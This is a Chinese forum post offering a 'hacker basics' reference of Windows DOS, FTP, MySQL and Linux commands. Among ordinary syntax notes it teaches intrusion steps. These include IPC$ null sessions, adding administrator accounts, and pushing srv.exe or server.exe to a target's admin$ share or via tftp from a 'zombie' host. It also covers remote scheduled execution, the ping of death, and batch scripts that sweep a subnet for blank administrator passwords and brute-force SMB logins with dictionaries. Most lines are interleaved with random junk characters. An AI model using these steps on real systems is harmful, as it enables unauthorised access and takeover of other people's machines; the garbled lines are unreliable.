黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 " x* l9 @4 a6 W8 b
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
8 p% a7 F# T9 S) p+ Y1 P- m7 Mnet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
' S5 O- [0 u. z. X. X/ [net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: ) L$ C' h# ?2 \
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 % W9 f# p% }+ ]5 f, }" t
net use h: /del 删除映射对方到本地的为H:的映射
* `. k7 B. B& D: }) rnet user 用户名　密码　/add 建立用户
# {1 F9 D' S+ v  b+ a& }, \& u4 e+ dnet user guest /active:yes 激活guest用户 8 N$ C" [% Y! k$ k
net user 查看有哪些用户
( b7 w. R3 i. Z) d1 N! rnet user 帐户名 查看帐户的属性
" n9 [! y3 p0 x# j* T) k) hnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 " Q% X8 [) ^& b, k$ |$ L# Z8 Y
net start 查看开启了哪些服务
' f, m* `$ U1 [" {2 E- V- ?6 Lnet start 服务名　 开启服务；(如:net start telnet， net start schedule) 8 h5 l# ^& X  r" t: k1 U3 d+ @
net stop 服务名 停止某服务
- j" n9 c. ^5 S( s( q. [net time \\目标ip 查看对方时间
/ M, Z* T( t& e6 i0 {9 znet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 . v. [1 T+ C7 U0 `
net view 查看本地局域网内开启了哪些共享 / {3 t# n+ z. [5 r* H8 ^- [
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 ( u  }8 O7 E$ {+ z
net config 显示系统网络设置 5 M6 E; [, t  e) N
net logoff 断开连接的共享 : `' u( Q/ Y* U( D
net pause 服务名 暂停某服务 + B3 o  S; f6 R$ c- P
net send ip "文本信息" 向对方发信息 8 W. {2 p  w* U5 R# d0 r
net ver 局域网内正在使用的网络连接类型和信息 . B% h+ N' s  U+ p7 w% J
net share 查看本地开启的共享
6 S* ^) M3 s. W/ P5 e, wnet share ipc$ 开启ipc$共享 ; e. w8 I6 U0 j& p; [: K
net share ipc$ /del 删除ipc$共享 9 Z% m4 Q5 B( k' O2 Q- _; @5 _4 W
net share c$ /del 删除C：共享
: U% i3 E' S+ \/ u2 P( N: Jnet user guest 12345 用guest用户登陆后用将密码改为12345
& c8 _3 W0 Y7 n/ U$ S! e6 Xnet password 密码 更改系统登陆密码 3 i' z& X7 R9 E2 f4 ~+ e! O
netstat -a 查看开启了哪些端口,常用netstat -an
1 y  n" J! y6 U6 B8 Z8 Z6 a& e- @netstat -n 查看端口的网络连接情况，常用netstat -an ) B1 h* ?" D  @$ O" I
netstat -v 查看正在进行的工作 0 e2 O/ b8 d$ C3 t& P
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） " P3 f( U# ]/ w& b
netstat -s 查看正在使用的所有协议使用情况 ( G8 A. j: \, e2 a; k& e- R
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 5 c( r, g7 q* _
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
1 x! h8 p( ]. F- F5 o3 {ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
3 i( a+ b3 W7 J& zping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 5 X1 ?5 r- w5 F" U# L4 y+ U1 i  ?
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
( [4 L! E. L2 z6 l, Xtlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) - i1 Y) W9 E# E6 {  Y
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) ( c" r- A7 }/ S5 v+ M
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 : i7 C( a. t+ R5 s
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） & k" A; G, k- G' D' R+ i5 |' j; x: T
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 ( s$ B. h8 i5 @
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
8 I6 Z) \3 |# a! X3 l0 Uat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 2 z' _) P% n- c+ `$ v
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
: N& H0 M& m6 Y) m4 [at id号 /delete 停止某个已注册的计划任务 * q5 [$ N* Y& c) F+ M
at 查看所有的计划任务 8 e, `/ f1 |8 T6 u
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 . T" d6 l/ u) R; h( l
finger username @host 查看最近有哪些用户登陆 1 H( B8 c5 V2 b+ c$ b. K$ @
telnet ip 端口 远和登陆服务器,默认端口为23
% T5 [$ Z& ]/ m: ~open ip 连接到IP（属telnet登陆后的命令） & a5 h; q1 o2 H; t/ x
telnet 在本机上直接键入telnet 将进入本机的telnet
4 s" V% I" [6 C, ccopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 4 ^2 I2 X" d( A& Y2 R5 `' f  r
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
( m8 @) f! s7 m6 l' ]cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 " s5 K2 i& r" g7 s* t5 l* G" Q
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
- c+ N1 Q' ]! o2 T* _, V; hxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 0 _& ^" [7 v: c! m* _2 ^
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
, x/ \; F0 M# K. y8 o8 @' ^tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 / Q2 s! Q# ^* o" q& U5 O
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
$ O8 G7 c; [1 L4 v1 ~" Z3 `  e' rroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
$ }; R* `- n0 f! ?arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 , g% ]+ i6 W" d7 O& n5 a* g
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
' Y, _, t! F0 e' ]mem 查看cpu使用情况
$ ]+ s, V/ g# g- G; tattrib 文件名(目录名) 查看某文件（目录）的属性   k3 l, h5 |2 H2 g
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 4 v0 q* i7 y$ \" V7 H& G
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
; }; V: |* X, u( Wdate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 # r" ~8 [' ^: W
set 指定环境变量名称=要指派给变量的字符 设置环境变量 ' {+ h& t+ x. N- p2 x* I
set 显示当前所有的环境变量
- T- W- I8 G. o+ cset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
% B6 i. w; k/ d$ q" v( B: [pause 暂停批处理程序，并显示出：请按任意键继续.... 8 z) y7 f$ H, V! R3 c, ^/ A+ m
if 在批处理程序中执行条件处理（更多说明见if命令及变量） + x/ v* u2 ]' k! F0 Q
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） " U3 o* e. v9 W& [
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） . r8 A4 d! Y0 d5 c8 k
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） 7 [# X! m. n8 v2 J/ X6 }8 e. n
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 9 Y% a6 b2 g* Z1 X0 l* e! H
echo 信息 在屏幕上显示出信息
! N$ z/ j" `4 ^& Xecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中
$ X" [! q) Z6 ^& J) `findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
) _& S1 {  Z$ B. Gfind 文件名 查找某文件
. J& K# P  K0 m, L3 n1 Xtitle 标题名字 更改CMD窗口标题名字   v! S+ G7 X% r# A
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 . p4 ]2 u) ]" [
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) . a1 \+ G: x$ q* @
print 文件名 打印文本文件 7 {$ @# L4 w% }6 K7 B4 E
ver 在DOS窗口下显示版本信息
9 a- f' P+ r' J2 v9 U  T) [winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） / _% L2 j/ ?; X" h& T' e% o
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS 8 V- \7 I5 r) e) }! |8 V2 W0 I
md　目录名 创建目录 & }. ^8 {7 B" l: V  c
replace 源文件　要替换文件的目录 替换文件 0 s7 E, ^1 _4 o# p
ren 原文件名　新文件名 重命名文件名 $ g8 C+ j* ~4 f) F6 _- I8 W' p
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
; R1 z# C$ I( y5 W8 H% U4 n4 w0 m! V( jtype 文件名 显示文本文件的内容 * y, e) I. x2 t" l1 {. h5 z' g
more 文件名 逐屏显示输出文件
+ H+ m% Y$ w! ~# Wdoskey 要锁定的命令＝字符
5 c2 m( y. K* ]+ O: hdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
/ ~* L/ f; w8 Z) c# staskmgr 调出任务管理器 6 H5 a6 k: C3 b3 s% f
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 3 {$ f; P5 Y3 k3 q% U# E
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 / L$ r3 e+ I, D% E% `
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
: w. k" ]/ ?2 I, o2 T" Dpath 路径\可执行文件的文件名 为可执行文件设置一个路径。
: ^: W7 C2 Y& j) C0 dcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? # }7 X* j6 K5 k+ Z" \% e
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； $ H! [- i, l% K. K6 J! J
regedit /e 注册表文件名 导出注册表 : O- @: P. |+ \6 O0 n
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
3 c5 e4 [  k. H4 zcacls 文件名 查看文件的访问用户权限列表
" r( t# v* r! IREM 文本内容 在批处理文件中添加注解
1 a- {7 S- E  b" ]! Wnetsh 查看或更改本地网络配置情况  A, l. O5 X4 b4 T) d& J
IIS服务命令：: t9 X4 s2 @) P% \$ ^; c5 m! L2 O
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
( P3 e$ e) }( ciisreset /start或stop 启动（停止）所有Internet服务
* H" b# r/ W% g$ [  w6 l1 k* f8 Siisreset /restart 停止然后重新启动所有Internet服务
$ k: _- f0 f1 [/ ~iisreset /status 显示所有Internet服务状态 . Q% G& y$ [; ]* O$ @$ R
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 * x6 ?, I7 B3 E6 G
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 ; D- j# b% k7 D: r
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 , b' t9 j0 o: E9 H- s- c
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
. H7 j# Q6 R0 b% @/ CFTP 命令： (后面有详细说明内容) 8 A8 Q8 F3 e, u$ C2 @4 j
ftp的命令行格式为:
6 w& z: Z: Y4 Eftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。" r5 n! h) F! U/ z5 D% u, q
－d 使用调试方式。
0 B# K. C6 s6 d1 q/ c－n 限制ftp的自动登录,即不使用.netrc文件。
- E: w; g4 s2 ^3 b# j# Y& M" `2 l0 _－g 取消全局文件名。 / [+ \! t# ?  o3 s' p, g
help [命令] 或 ？[命令] 查看命令说明 5 {) N. {$ d) [: }' {
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
/ E9 x5 h; _3 _* r& vpwd 列出当前远端主机目录
# `4 m- v( K* k3 A) |; M+ I2 z( [put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
( y& `( u9 w$ t7 zget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
6 ]! K! V1 e& ]6 umget [remote-files] 从远端主机接收一批文件至本地主机 ) R4 B4 ~' {" ^( G
mput local-files 将本地主机中一批文件传送至远端主机 ; c# M* p7 r2 _3 L, \, a% D6 x& L
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
; o' C% a" e) H" U! Bascii 设定以ASCII方式传送文件(缺省值) 9 e/ r: V; Q1 a9 I, u% ^
bin 或 image 设定以二进制方式传送文件
  b; E8 R' N. l$ ]bell 每完成一次文件传送,报警提示
) P: i% k! l0 {8 G1 _' K" Ncdup 返回上一级目录
9 b( }7 E! h* L2 m; rclose 中断与远程服务器的ftp会话(与open对应) : w& c1 k1 h% |; Q5 P8 B
open host[port] 建立指定ftp服务器连接,可指定连接端口
: R+ S5 D4 v& Idelete 删除远端主机中的文件
3 [8 a( B. p9 V2 Y5 w: f& Zmdelete [remote-files] 删除一批文件
) H% r1 {* g: C  u- S- k4 G/ nmkdir directory-name 在远端主机中建立目录
* i+ x) G0 c3 r$ Urename [from] [to] 改变远端主机中的文件名 3 x* I" v* `2 d
rmdir directory-name 删除远端主机中的目录
( W" x1 }9 c# A/ j( ~% {* astatus 显示当前FTP的状态 , n1 m# v1 A0 a' U
system 显示远端主机系统类型
/ T+ g! T6 d" n; p; I# Luser user-name [password] [account] 重新以别的用户名登录远端主机
" {% t6 h- s- Z8 c3 R# eopen host [port] 重新建立一个新的连接 4 k* ?/ O3 i7 a  x+ g; K
prompt 交互提示模式
% h" S2 d  b* m( Vmacdef 定义宏命令 & `4 V0 x# i0 T0 ~! R
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 + F' G" W1 {, F8 X5 N5 Y  A- ~
chmod 改变远端主机的文件权限 $ Y$ ?% L3 E# C% q- y3 C; c; c
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
8 z2 P' Z- [9 Y- g3 ]9 x. ~cd remote－dir 进入远程主机目录 ) [8 ]1 c5 z$ t, {# K7 W& {
cdup 进入远程主机目录的父目录
0 O$ U& P4 i0 T! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip - [* ^2 b* b3 P. e, D
MYSQL 命令：
9 V% G3 B& f1 `+ r8 [6 c& bmysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
( }% s6 l. i4 Y* p6 ?（例：mysql -h110.110.110.110 -Uroot -P123456
; f# |) s/ X) X5 R$ W9 i注:u与root可以不用加空格，其它也一样）
2 o# ?0 F( w/ ?( t& x% k' x; o5 Lexit 退出MYSQL
1 }! m3 }8 [: v& ^' t; dmysqladmin -u用户名 -p旧密码 password 新密码 修改密码 ' u5 l, o4 K$ E3 S6 M
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） " ^6 `2 F, K- A9 u' }# ]$ t" B' N
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
1 W0 Y* y0 E7 L0 ~9 iuse mysql；2 g9 j  J7 z7 Q. Z
show tables; 显示库中的数据表 0 `+ |) Y8 J. F
describe 表名; 显示数据表的结构
1 o8 x* Q! \5 e/ v: i7 v( Z6 dcreate database 库名; 建库 1 p2 g: N: z, s2 N+ \9 S
use 库名；
! o6 `2 h; B3 W6 E3 K" ccreate table 表名 (字段设定列表)； 建表 7 m7 s* V" T  J
drop database 库名; - n: E. \/ E, I) c# h, G" Q% k
drop table 表名； 删库和删表 3 Y/ w) Z- N* g# a  i: y
delete from 表名; 将表中记录清空 $ L& w/ \: I# o( a
select * from 表名; 显示表中的记录
7 i# |) g; ?8 g& `  Tmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 $ X3 [( E+ i9 R+ b# a$ u3 a% p; X
win2003系统下新增命令（实用部份）： 6 {* I6 l. v9 w! i7 T5 ~* \1 x+ v
shutdown /参数 关闭或重启本地或远程主机。
4 ]9 [9 l. V: ^& E" f& B1 B参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。6 {* H; e4 ]! y& U
例：shutdown /r /t 0 立即重启本地主机（无延时）
; T: p0 S1 y* t5 G; ptaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。3 r& B9 u' K6 ~- d- K8 S
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 + A, f0 c) ?1 _7 t# }
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
5 a& e: o$ y' [% v% Z% b# s) l  J( c8 Y参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
5 g& ^" |$ u& _8 ^Linux系统下基本命令： 要区分大小写" J( Y& O2 v7 W4 H4 K
uname 显示版本信息（同win2K的 ver）
9 p: S* L4 N1 x- M" s* Mdir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
+ I. w8 e5 A$ T8 G8 \8 ?pwd 查询当前所在的目录位置 ; S9 R6 h9 o7 c; i) g
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 0 Z$ H5 {* V' W1 B! ~/ N
cat 文件名 查看文件内容
" u: \) I/ G+ a% l4 d2 q- U0 gcat >abc.txt 往abc.txt文件中写上内容。
7 ~3 _- N3 r0 |1 K% k* |9 G- ?more 文件名 以一页一页的方式显示一个文本文件。
' s$ f) t& T# X( F" scp 复制文件 ; h' n) R3 Z7 g6 N
mv 移动文件 . P8 j' F2 L) n" g+ E
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
% N9 a3 ~1 m* l: X3 omkdir 目录名 建立目录 - F$ h6 u+ O" r
rmdir 删除子目录，目录内没有文档。
' s3 `9 N! d, d$ [  K+ F% ]chmod 设定档案或目录的存取权限 ( ?7 `/ X' N1 d
grep 在档案中查找字符串 9 l/ _5 k- ^' j3 T  S  i" ~
diff 档案文件比较 / O) B8 R8 m% C7 v
find 档案搜寻
& S) t1 e+ [8 e1 q" Qdate 现在的日期、时间
* `* z7 X7 U/ i/ I7 j6 Dwho 查询目前和你使用同一台机器的人以及Login时间地点
: |4 [* S* q, |% b$ Vw 查询目前上机者的详细资料
- p) x5 F8 O. j) g4 I, K/ gwhoami 查看自己的帐号名称
+ a3 v, `% t1 @4 \groups 查看某人的Group
, i; z5 U. A! @, R) i# i- o5 @passwd 更改密码
4 T3 w" n6 |6 h, Jhistory 查看自己下过的命令 7 `, A9 }. V( T- X. X1 z/ y3 p9 k
ps 显示进程状态 ( z* X- A! R" I9 r/ M
kill 停止某进程
0 X' k  {9 ?& M2 Z* ^# Qgcc 黑客通常用它来编译C语言写的文件
& B' E2 ?1 _5 G- K9 W' x  ?su 权限转换为指定使用者
1 x6 p+ `6 p. F& r, k8 A1 etelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 # I8 j3 s6 a5 y2 B& }
ftp ftp连接上某服务器（同win2K
: T' `5 d# H5 u8 \- [, i附：批处理命令与变量5 w) o1 ]) p  f5 P
1：for命令及变量 基本格式：
4 a  ]. [. H# A. D5 E1 LFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
- z3 e* K5 j6 L批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3$ A3 \2 j3 ?. c
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
$ z) [( ~8 j- V" fcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
3 {4 F$ M+ f  }( m! s0 K6 F) zcommand_parameters：为特定命令指定参数或命令行开关
0 a7 ]  P& F5 QIN (set)：指在(set)中取值；DO command ：指执行command, q; R' b; Q# s# Q# F
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 1 b# X& b3 i; I% D! w
用法举例： ; [* F9 l2 ~) Y5 `8 I$ [
@echo off + j5 L' _- ?7 B' W5 h
echo 用法格式：test.bat *.*.* > test.txt 5 d( h2 e# G0 n" V  K& c; O
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
5 ?5 B, _  D8 L) @存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
/ o% H- j, V; M. e7 H" \3 @/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 # l* I9 `" ], u( N) P8 ^
@echo off
) E- a. ?: W( A- w0 b6 Z& u  Y% jecho 用法格式：ok.bat ip
  X" O$ R& b7 q# I5 H9 mFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
2 {' B( F: J' ]: B; _存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
+ @; e8 H- h2 W6 L2：if命令及变量 基本格式：
4 @; b3 ?3 F. X/ XIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。# k( ^4 i* X$ J- x9 \* P$ M6 b0 L
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。, y. m5 [7 g  B" ]5 ~$ Z* K* m
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
5 d. P* f8 h4 R# D* fIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
6 s8 O3 B7 }) d" J3 E例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
* M% `  ?1 n  o" n; y8 lIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。& Z: w1 d* T6 G$ P
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
, s/ q  Z' j  }3 XIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”